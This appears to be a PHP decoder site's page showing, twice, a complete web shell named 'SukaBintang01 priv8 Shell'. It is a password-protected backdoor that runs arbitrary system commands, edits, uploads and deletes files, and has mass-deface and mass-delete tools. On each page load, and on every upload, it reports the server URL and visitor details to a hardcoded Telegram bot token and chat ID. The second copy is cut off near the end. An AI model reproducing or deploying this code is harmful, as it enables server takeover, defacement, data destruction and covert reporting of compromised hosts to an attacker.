Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php session_start(); function sendToTelegram($message) { $botToken = "7502563828:..
Decoded Output download
<?php
session_start();
function sendToTelegram($message) {
$botToken = "7502563828:AAE3gMvWi2-thrgX0k9mgy_EAecYXSCgAMs";
$chatID = "2024533279";
$url = "https://api.telegram.org/bot$botToken/sendMessage";
$data = [
'chat_id' => $chatID,
'text' => $message
];
$options = [
'http' => [
'header' => "Content-Type: application/x-www-form-urlencoded
",
'method' => 'POST',
'content' => http_build_query($data),
],
];
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
return $result ? true : false;
}
@set_time_limit(0);
@clearstatcache();
///////////////
$folder = "data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=";
$file = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=";
////////////////
function uni_exec($s){
if(function_exists("exec")){
$buff = "";
@exec($s, $r);
foreach($r as $r){
$buff .= $r."<br>";
}
return $buff;
}
else if(function_exists("passthru")){
@ob_start();
@passthru($s);
$str = @ob_get_contents();
@ob_end_clean();
return $str;
}
else if(function_exists("system")){
@ob_start();
@passthru($s);
$str = @ob_get_contents();
@ob_end_clean();
return $str;
}
else return "<red>Unable to execute command</red>";
}
function uni_subdir($s, $flags = 0){
$f = glob($s, $flags);
foreach(glob(dirname($s)."/*", $flags) as $g){
$f = array_merge($f, uni_subdir($g."/".basename($s), $flags));
}
return $f;
}
function uni_size($s)
{
$type = array("", "KB", "MB", "GB", "TB", "PB", );
$index = 0;
while( $s >= 1024 ){
$s /= 1024;
$index++;
}
return sprintf("%1.2f",$s).$type[$index];
}
function uni_perm($s)
{
return array(
is_writable($s) ? "<green>Write</green>":"<red>Write</red>",
is_readable($s) ? "<green>Read</green>":"<red>Read</red>",
is_executable($s) ? "<green>Exec</green>":"<red>Exec</red>"
);
}
?>
<title>
@SukaBintang01 priv8 Shell
</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<?php
$password = "SukaBintang01";
if(isset($_POST["password"]) && $_POST["password"] == $password && empty($_SESSION["id"])){
$_SESSION["id"] = $password;
}
?>
<link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">
<style>
* {
font-family: "Raleway";
color: white;
}
red {
color: red;
}
green {
color: green;
}
table, th, tr {
border: 1px solid #91FF00;
border-collapse: collapse;
font-size: 90%;
padding: 7px;
text-align: left;
overflow: auto;
}
a {
text-decoration: none;
}
#small-dotted {
border: 1px dotted green;
padding: 5px;
margin: 5px;
width: 40%;
background: #38B344;
text-align: center;
display: inline-block;
}
#banner {
border: 1px dotted yellow;
padding: 10px;
margin: 10px;
}
textarea {
resize: none;
border: none;
border-radius: 10px;
color: black;
width: 90%;
height: 50%;
}
#small-solid {
border: 1px solid cyan;
padding: 10px;
margin: 10px;
}
#input {
border: none;
background: white;
padding: 10px;
margin: 10px;
display: inline-block;
border-radius: 10px;
color: black;
}
#button {
border: none;
background: #0AC120;
padding: 10px;
margin: 5px;8
display: inline-block;
}
#panel {
border: none;
background: black;
padding: 10px;
margin: 5px;
width: 45%;
display: inline-block;
}
</style>
<link rel="icon" href="https://i.imgrpost.com/imgr/2019/07/10/download.png">
<body bgcolor="black">
<div id="banner">
<center>
<b>sukabintang01 priv8 shell</b><br>
<a href="?">[ HOME ]</a> <a href="?do=logout">[ LOGOUT ]</a>
<a href="?dir=<?php echo isset($_GET['dir']) ? dirname($_GET['dir']) : (isset($_GET['src']) ? dirname($_GET['src']) : getcwd()); ?>">[ BACK ]</a>
</center>
</div>
<?php
$fileUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$ipAddress = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$message = "File URL: $fileUrl
IP Address: $ipAddress
User-Agent: $userAgent";
sendToTelegram($message);
////////////////
if(isset($_GET["do"]) && isset($_SESSION["id"])){
switch($_GET["do"]){
case "edit":
if(isset($_POST["content"]) && isset($_GET["src"])){
$p = @file_put_contents($_GET["src"], stripslashes($_POST["content"]));
echo ($p) ? "<green>Success</green>":"<red>Failed</red>";
die("<center><a href='?'>Back</a></center>");
}
$p = @file_get_contents(realpath($_GET["src"]));
if($p) echo "
<center>
<form method='POST' action='?do=edit&src=".$_GET["src"]."'>
<green>File: ".realpath($_GET["src"])." </green>
<textarea name='content'>".htmlspecialchars($p)."</textarea>
<button id='button' style='width: 50%;'>Save</button>
</center>
";
else echo "
<center>
<red>Cant open file..</red>
</center>
";
die();
break;
///
case "rename":
if(isset($_POST["content"]) && isset($_GET["src"])){
$p = @rename(realpath($_GET["src"]), $_POST["content"]);
echo ($p) ? "<green>Success</green>":"<red>Failed</red>";
die("<center><a href='?'>Back</a></center>");
}
echo "
<center>
<form method='POST' action='?do=rename&src=".$_GET["src"]."'>
<input id='input' name='content' placeholder='".realpath($_GET["src"])."' value='".realpath($_GET["src"])."'>
<button id='button'>Rename</button>
</form>
</center>
";
die();
break;
////
case "newfile":
if(@file_put_contents(realpath($_GET["src"])."/newfile.php", " ")) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "mkdir":
if(mkdir(realpath($_GET["src"])."/newfolder")) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "unlink":
if(@unlink(realpath($_GET["src"]))) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "rmdir":
if(@rmdir(realpath($_GET["src"]))) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "chmod":
if(isset($_GET["src"]) and isset($_POST["content"])){
$p = @chmod(realpath($_GET["src"]), $_POST["content"]);
echo ($p) ? "<green>Success</green>":"<red>Failed</red>";
die("<center><a href='?'>Back</a></center>");
}
echo "
<center>
<form method='POST' action='?do=chmod&src=".$_GET["src"]."'>
<input id='input' name='content' placeholder='".fileperms(realpath($_GET["src"]))."' value='".fileperms(realpath($_GET["src"]))."'>
<button id='button'>Chmod</button>
</form>
</center>
";
die();
break;
/////
case "logout":
unset($_SESSION["id"]);
session_destroy();
break;
case "copy":
if(copy(realpath($_GET["src"]), realpath($_GET["src"]).mt_rand())) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "upload":
$targetFile = realpath($_GET["dir"])."/".$_FILES["qqfile"]["name"];
if (move_uploaded_file($_FILES["qqfile"]["tmp_name"], $targetFile)) {
echo "<green>Success</green>";
$uploadedFileUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") .
"://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['REQUEST_URI']) . "/" . $_FILES["qqfile"]["name"];
sendToTelegram("File uploaded successfully: $uploadedFileUrl");
} else {
echo "<red>Failed</red>";
}
echo "<br>";
break;
////
case "properties":
if(@stat(realpath($_GET["src"]))) {
echo "<green>Success</green><hr>";
foreach( array_slice(stat(realpath($_GET["src"])), 13) as $name=>$stat){
$stat = ($name == "atime") ? date("FdYH:i:s.", $stat) : $stat;
$stat = ($name == "mtime") ? date("FdYH:i:s.", $stat) : $stat;
$stat = ($name == "ctime") ? date("FdYH:i:s.", $stat) : $stat;
$stat = ($name == "size") ? uni_size($stat) : $stat;
echo $name.": <green>".$stat."</green><hr>";
}
}
else echo "<red>Failed</red>";
echo "<br>";
die();
break;
////////////
case "mass_deface":
if(isset($_POST["text"]) && isset($_POST["name"]) && isset($_GET["src"])){
$pt = realpath($_GET["src"]);
$text = $_POST["text"];
$name = $_POST["name"];
$dd = uni_subdir("$pt/*", GLOB_ONLYDIR|GLOB_NOSORT);
foreach($dd as $ddr){
if(@file_put_contents($ddr."/".$name, $text))
echo "<green>$ddr/$name</green><br>";
else
echo "<red>$ddr/$name</red><br>";
}
}
echo "
<form method='POST' action='?do=mass_deface&src=".$_GET["src"]."'>
<center>
<input id='input' name='name' value='index.php' placeholder='name'><hr>
<textarea placeholder='text' name='text'></textarea><hr>
<button id='button' style='width: 50%'>Tusbol</button>
</center>
</form>
";
die();
break;
///
case "mass_delete":
if(isset($_POST["name"]) && isset($_GET["src"])){
$pt = realpath($_GET["src"]);
$name = $_POST["name"];
$dd = uni_subdir("$pt/$name", GLOB_NOSORT);
foreach($dd as $ddr){
if(@unlink($ddr,$text))
echo "<green>$ddr</green><br>";
else
echo "<red>$ddr</red><br>";
}
}
echo "
<form method='POST' action='?do=mass_delete&src=".$_GET["src"]."'>
<center>
<input id='input' name='name' value='index.php' placeholder='name'><hr>
<button id='button' style='width: 50%'>Tusbol</button>
</center>
</form>
";
die();
break;
//////
case "writable":
if(isset($_GET["src"]) && isset($_POST["name"])){
$pt = realpath($_GET["src"]);
$name = $_POST["name"];
$dd = uni_subdir("$pt/$name");
foreach($dd as $ddr){
if(is_writable($ddr))
echo "<green>$ddr</green><br>";
}
}
echo "
<form method='POST' action='?do=writable&src=".$_GET["src"]."'>
<center>
<input id='input' name='name' value='*.php' placeholder='Regex'><hr>
<button id='button' style='width: 50%'>Tusbol</button>
</center>
</form>
";
die();
break;
}
}
//////////////
?>
<?php
if(!isset($_SESSION["id"])):
?>
<form method="POST" action="">
<input name="password" id="input" placeholder="password" style="width: 60%;">
<button id="button" style="width: 30%">Login</button>
</form>
<?php
die();
else:
$dir = isset($_GET["dir"]) ? $_GET["dir"] : getcwd();
?>
System:
<div id="small-solid">
<font style="color: #0CEB9A;"><?php echo php_uname(); ?></font>
</div>
Others:
<div id="small-solid">
My IP: <font style="color: #0CEB9A;"><?php echo $_SERVER["REMOTE_ADDR"]; ?></font><br>
Server IP: <font style="color: #0CEB9A;"><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></font><br>
Free: <font style="color: #0CEB9A;"><?php echo uni_size(disk_free_space(".")); ?></font><br>
User: <font style="color: #0CEB9A;"><?php echo get_current_user(); ?></font><br>
PYTHON: <?php echo (uni_exec("python --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
PERL: <?php echo (uni_exec("perl --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
WGET: <?php echo (uni_exec("wget --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
CURL: <?php echo (uni_exec("curl --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
</div>
<div id="small-solid">
<form method="POST" action="?do=upload&dir=<?php echo $dir; ?>" enctype="multipart/form-data">
<input type="file" name="qqfile">
<input type="submit" id="button" value="upload">
</form>
</div>
Toolbox:
<div id="small-solid" style="text-align: center;">
<div id="small-dotted">
<a href="?do=mass_deface&src=<?php echo $dir; ?>">Mass Deface</a>
</div>
<div id="small-dotted">
<a href="?do=mass_delete&src=<?php echo $dir?>">Mass Delete</a>
</div>
<div id="small-dotted">
<a href="?do=writable&src=<?php echo $dir?>">Writable</a>
</div>
</div>
<table style="width: 100%;">
<tr>
<th>Name</th>
<th>Permission</th>
<th>Action</th>
</tr>
<?php
$hb = "";
$nb = "";
$hit = "";
foreach(explode("/",realpath($dir)) as $vb){
$hb .= $vb."/";
$nb = $vb;
$hit .= "<a href='?dir=$hb'>$nb/</a>";
}
echo "Path: $hit";
echo "<br>
<form method='POST' action='?do=cmd&dir=$dir'>
SukaBintang01.~$<input id='input' name='cmd' placeholder='command'>
</form>
";
echo isset($_POST["cmd"]) ? uni_exec($_POST["cmd"]) : "";
if(!@scandir($dir)){
die("<red>permmission denied</red>");
}
foreach( scandir($dir) as $item){
$perm = uni_perm($dir."/".$item);
if($item == "." OR $item == ".."){
$ite = "<a href='?dir=$dir/$item'>$item</a>";
echo "
<tr>
<th><img src='$folder'>$ite</th>
<th>$perm[0] - $perm[1] - $perm[2]</th>
<th>
<a href='?do=newfile&src=$dir/$item&dir=$dir'>New File</a>
<a href='?do=mkdir&src=$dir/$item&dir=$dir'>New Folder</a>
</th>
</tr>
";
continue;
}
if(is_dir($dir."/".$item)){
$ite = "<a href='?dir=$dir/$item'>$item</a>";
echo "
<tr>
<th><img src='$folder'>$ite</th>
<th>$perm[0] - $perm[1] - $perm[2]</th>
<th>
<a href='?do=rename&src=$dir/$item&dir=$dir'>Rename</a>
<a href='?do=rmdir&src=$dir/$item&dir=$dir'>Delete</a>
<a href='?do=chmod&src=$dir/$item&dir=$dir'>Chmod</a>
<a href='?do=properties&src=$dir/$item&dir=$dir'>Info</a>
</th>
</tr>
";
}
}
foreach( scandir($dir) as $item){
$perm = uni_perm($dir."/".$item);
if(is_file($dir."/".$item)){
$ite = "<a href='?do=edit&src=$dir/$item'>$item</a>";
echo "
<tr>
<th><img src='$file'>$ite</th>
<th>$perm[0] - $perm[1] - $perm[2]</th>
<th>
<a href='?do=rename&src=$dir/$item&dir=$dir'>Rename</a>
<a href='?do=unlink&src=$dir/$item&dir=$dir'>Delete</a>
<a href='?do=chmod&src=$dir/$item&dir=$dir'>Chmod</a>
<a href='?do=copy&src=$dir/$item&dir=$dir'>Copy</a>
<a href='?do=properties&src=$dir/$item&dir=$dir'>Info</a>
</th>
</tr>
";
}
}
?>
</table>
<?php
endif;
?>
</body>
Did this file decode correctly?
Original Code
<?php
session_start();
function sendToTelegram($message) {
$botToken = "7502563828:AAE3gMvWi2-thrgX0k9mgy_EAecYXSCgAMs";
$chatID = "2024533279";
$url = "https://api.telegram.org/bot$botToken/sendMessage";
$data = [
'chat_id' => $chatID,
'text' => $message
];
$options = [
'http' => [
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data),
],
];
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
return $result ? true : false;
}
@set_time_limit(0);
@clearstatcache();
///////////////
$folder = "data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=";
$file = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=";
////////////////
function uni_exec($s){
if(function_exists("exec")){
$buff = "";
@exec($s, $r);
foreach($r as $r){
$buff .= $r."<br>";
}
return $buff;
}
else if(function_exists("passthru")){
@ob_start();
@passthru($s);
$str = @ob_get_contents();
@ob_end_clean();
return $str;
}
else if(function_exists("system")){
@ob_start();
@passthru($s);
$str = @ob_get_contents();
@ob_end_clean();
return $str;
}
else return "<red>Unable to execute command</red>";
}
function uni_subdir($s, $flags = 0){
$f = glob($s, $flags);
foreach(glob(dirname($s)."/*", $flags) as $g){
$f = array_merge($f, uni_subdir($g."/".basename($s), $flags));
}
return $f;
}
function uni_size($s)
{
$type = array("", "KB", "MB", "GB", "TB", "PB", );
$index = 0;
while( $s >= 1024 ){
$s /= 1024;
$index++;
}
return sprintf("%1.2f",$s).$type[$index];
}
function uni_perm($s)
{
return array(
is_writable($s) ? "<green>Write</green>":"<red>Write</red>",
is_readable($s) ? "<green>Read</green>":"<red>Read</red>",
is_executable($s) ? "<green>Exec</green>":"<red>Exec</red>"
);
}
?>
<title>
@SukaBintang01 priv8 Shell
</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<?php
$password = "SukaBintang01";
if(isset($_POST["password"]) && $_POST["password"] == $password && empty($_SESSION["id"])){
$_SESSION["id"] = $password;
}
?>
<link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">
<style>
* {
font-family: "Raleway";
color: white;
}
red {
color: red;
}
green {
color: green;
}
table, th, tr {
border: 1px solid #91FF00;
border-collapse: collapse;
font-size: 90%;
padding: 7px;
text-align: left;
overflow: auto;
}
a {
text-decoration: none;
}
#small-dotted {
border: 1px dotted green;
padding: 5px;
margin: 5px;
width: 40%;
background: #38B344;
text-align: center;
display: inline-block;
}
#banner {
border: 1px dotted yellow;
padding: 10px;
margin: 10px;
}
textarea {
resize: none;
border: none;
border-radius: 10px;
color: black;
width: 90%;
height: 50%;
}
#small-solid {
border: 1px solid cyan;
padding: 10px;
margin: 10px;
}
#input {
border: none;
background: white;
padding: 10px;
margin: 10px;
display: inline-block;
border-radius: 10px;
color: black;
}
#button {
border: none;
background: #0AC120;
padding: 10px;
margin: 5px;8
display: inline-block;
}
#panel {
border: none;
background: black;
padding: 10px;
margin: 5px;
width: 45%;
display: inline-block;
}
</style>
<link rel="icon" href="https://i.imgrpost.com/imgr/2019/07/10/download.png">
<body bgcolor="black">
<div id="banner">
<center>
<b>sukabintang01 priv8 shell</b><br>
<a href="?">[ HOME ]</a> <a href="?do=logout">[ LOGOUT ]</a>
<a href="?dir=<?php echo isset($_GET['dir']) ? dirname($_GET['dir']) : (isset($_GET['src']) ? dirname($_GET['src']) : getcwd()); ?>">[ BACK ]</a>
</center>
</div>
<?php
$fileUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$ipAddress = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$message = "File URL: $fileUrl\nIP Address: $ipAddress\nUser-Agent: $userAgent";
sendToTelegram($message);
////////////////
if(isset($_GET["do"]) && isset($_SESSION["id"])){
switch($_GET["do"]){
case "edit":
if(isset($_POST["content"]) && isset($_GET["src"])){
$p = @file_put_contents($_GET["src"], stripslashes($_POST["content"]));
echo ($p) ? "<green>Success</green>":"<red>Failed</red>";
die("<center><a href='?'>Back</a></center>");
}
$p = @file_get_contents(realpath($_GET["src"]));
if($p) echo "
<center>
<form method='POST' action='?do=edit&src=".$_GET["src"]."'>
<green>File: ".realpath($_GET["src"])." </green>
<textarea name='content'>".htmlspecialchars($p)."</textarea>
<button id='button' style='width: 50%;'>Save</button>
</center>
";
else echo "
<center>
<red>Cant open file..</red>
</center>
";
die();
break;
///
case "rename":
if(isset($_POST["content"]) && isset($_GET["src"])){
$p = @rename(realpath($_GET["src"]), $_POST["content"]);
echo ($p) ? "<green>Success</green>":"<red>Failed</red>";
die("<center><a href='?'>Back</a></center>");
}
echo "
<center>
<form method='POST' action='?do=rename&src=".$_GET["src"]."'>
<input id='input' name='content' placeholder='".realpath($_GET["src"])."' value='".realpath($_GET["src"])."'>
<button id='button'>Rename</button>
</form>
</center>
";
die();
break;
////
case "newfile":
if(@file_put_contents(realpath($_GET["src"])."/newfile.php", " ")) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "mkdir":
if(mkdir(realpath($_GET["src"])."/newfolder")) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "unlink":
if(@unlink(realpath($_GET["src"]))) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "rmdir":
if(@rmdir(realpath($_GET["src"]))) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "chmod":
if(isset($_GET["src"]) and isset($_POST["content"])){
$p = @chmod(realpath($_GET["src"]), $_POST["content"]);
echo ($p) ? "<green>Success</green>":"<red>Failed</red>";
die("<center><a href='?'>Back</a></center>");
}
echo "
<center>
<form method='POST' action='?do=chmod&src=".$_GET["src"]."'>
<input id='input' name='content' placeholder='".fileperms(realpath($_GET["src"]))."' value='".fileperms(realpath($_GET["src"]))."'>
<button id='button'>Chmod</button>
</form>
</center>
";
die();
break;
/////
case "logout":
unset($_SESSION["id"]);
session_destroy();
break;
case "copy":
if(copy(realpath($_GET["src"]), realpath($_GET["src"]).mt_rand())) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "upload":
$targetFile = realpath($_GET["dir"])."/".$_FILES["qqfile"]["name"];
if (move_uploaded_file($_FILES["qqfile"]["tmp_name"], $targetFile)) {
echo "<green>Success</green>";
$uploadedFileUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") .
"://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['REQUEST_URI']) . "/" . $_FILES["qqfile"]["name"];
sendToTelegram("File uploaded successfully: $uploadedFileUrl");
} else {
echo "<red>Failed</red>";
}
echo "<br>";
break;
////
case "properties":
if(@stat(realpath($_GET["src"]))) {
echo "<green>Success</green><hr>";
foreach( array_slice(stat(realpath($_GET["src"])), 13) as $name=>$stat){
$stat = ($name == "atime") ? date("FdYH:i:s.", $stat) : $stat;
$stat = ($name == "mtime") ? date("FdYH:i:s.", $stat) : $stat;
$stat = ($name == "ctime") ? date("FdYH:i:s.", $stat) : $stat;
$stat = ($name == "size") ? uni_size($stat) : $stat;
echo $name.": <green>".$stat."</green><hr>";
}
}
else echo "<red>Failed</red>";
echo "<br>";
die();
break;
////////////
case "mass_deface":
if(isset($_POST["text"]) && isset($_POST["name"]) && isset($_GET["src"])){
$pt = realpath($_GET["src"]);
$text = $_POST["text"];
$name = $_POST["name"];
$dd = uni_subdir("$pt/*", GLOB_ONLYDIR|GLOB_NOSORT);
foreach($dd as $ddr){
if(@file_put_contents($ddr."/".$name, $text))
echo "<green>$ddr/$name</green><br>";
else
echo "<red>$ddr/$name</red><br>";
}
}
echo "
<form method='POST' action='?do=mass_deface&src=".$_GET["src"]."'>
<center>
<input id='input' name='name' value='index.php' placeholder='name'><hr>
<textarea placeholder='text' name='text'></textarea><hr>
<button id='button' style='width: 50%'>Tusbol</button>
</center>
</form>
";
die();
break;
///
case "mass_delete":
if(isset($_POST["name"]) && isset($_GET["src"])){
$pt = realpath($_GET["src"]);
$name = $_POST["name"];
$dd = uni_subdir("$pt/$name", GLOB_NOSORT);
foreach($dd as $ddr){
if(@unlink($ddr,$text))
echo "<green>$ddr</green><br>";
else
echo "<red>$ddr</red><br>";
}
}
echo "
<form method='POST' action='?do=mass_delete&src=".$_GET["src"]."'>
<center>
<input id='input' name='name' value='index.php' placeholder='name'><hr>
<button id='button' style='width: 50%'>Tusbol</button>
</center>
</form>
";
die();
break;
//////
case "writable":
if(isset($_GET["src"]) && isset($_POST["name"])){
$pt = realpath($_GET["src"]);
$name = $_POST["name"];
$dd = uni_subdir("$pt/$name");
foreach($dd as $ddr){
if(is_writable($ddr))
echo "<green>$ddr</green><br>";
}
}
echo "
<form method='POST' action='?do=writable&src=".$_GET["src"]."'>
<center>
<input id='input' name='name' value='*.php' placeholder='Regex'><hr>
<button id='button' style='width: 50%'>Tusbol</button>
</center>
</form>
";
die();
break;
}
}
//////////////
?>
<?php
if(!isset($_SESSION["id"])):
?>
<form method="POST" action="">
<input name="password" id="input" placeholder="password" style="width: 60%;">
<button id="button" style="width: 30%">Login</button>
</form>
<?php
die();
else:
$dir = isset($_GET["dir"]) ? $_GET["dir"] : getcwd();
?>
System:
<div id="small-solid">
<font style="color: #0CEB9A;"><?php echo php_uname(); ?></font>
</div>
Others:
<div id="small-solid">
My IP: <font style="color: #0CEB9A;"><?php echo $_SERVER["REMOTE_ADDR"]; ?></font><br>
Server IP: <font style="color: #0CEB9A;"><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></font><br>
Free: <font style="color: #0CEB9A;"><?php echo uni_size(disk_free_space(".")); ?></font><br>
User: <font style="color: #0CEB9A;"><?php echo get_current_user(); ?></font><br>
PYTHON: <?php echo (uni_exec("python --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
PERL: <?php echo (uni_exec("perl --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
WGET: <?php echo (uni_exec("wget --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
CURL: <?php echo (uni_exec("curl --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
</div>
<div id="small-solid">
<form method="POST" action="?do=upload&dir=<?php echo $dir; ?>" enctype="multipart/form-data">
<input type="file" name="qqfile">
<input type="submit" id="button" value="upload">
</form>
</div>
Toolbox:
<div id="small-solid" style="text-align: center;">
<div id="small-dotted">
<a href="?do=mass_deface&src=<?php echo $dir; ?>">Mass Deface</a>
</div>
<div id="small-dotted">
<a href="?do=mass_delete&src=<?php echo $dir?>">Mass Delete</a>
</div>
<div id="small-dotted">
<a href="?do=writable&src=<?php echo $dir?>">Writable</a>
</div>
</div>
<table style="width: 100%;">
<tr>
<th>Name</th>
<th>Permission</th>
<th>Action</th>
</tr>
<?php
$hb = "";
$nb = "";
$hit = "";
foreach(explode("/",realpath($dir)) as $vb){
$hb .= $vb."/";
$nb = $vb;
$hit .= "<a href='?dir=$hb'>$nb/</a>";
}
echo "Path: $hit";
echo "<br>
<form method='POST' action='?do=cmd&dir=$dir'>
SukaBintang01.~$<input id='input' name='cmd' placeholder='command'>
</form>
";
echo isset($_POST["cmd"]) ? uni_exec($_POST["cmd"]) : "";
if(!@scandir($dir)){
die("<red>permmission denied</red>");
}
foreach( scandir($dir) as $item){
$perm = uni_perm($dir."/".$item);
if($item == "." OR $item == ".."){
$ite = "<a href='?dir=$dir/$item'>$item</a>";
echo "
<tr>
<th><img src='$folder'>$ite</th>
<th>$perm[0] - $perm[1] - $perm[2]</th>
<th>
<a href='?do=newfile&src=$dir/$item&dir=$dir'>New File</a>
<a href='?do=mkdir&src=$dir/$item&dir=$dir'>New Folder</a>
</th>
</tr>
";
continue;
}
if(is_dir($dir."/".$item)){
$ite = "<a href='?dir=$dir/$item'>$item</a>";
echo "
<tr>
<th><img src='$folder'>$ite</th>
<th>$perm[0] - $perm[1] - $perm[2]</th>
<th>
<a href='?do=rename&src=$dir/$item&dir=$dir'>Rename</a>
<a href='?do=rmdir&src=$dir/$item&dir=$dir'>Delete</a>
<a href='?do=chmod&src=$dir/$item&dir=$dir'>Chmod</a>
<a href='?do=properties&src=$dir/$item&dir=$dir'>Info</a>
</th>
</tr>
";
}
}
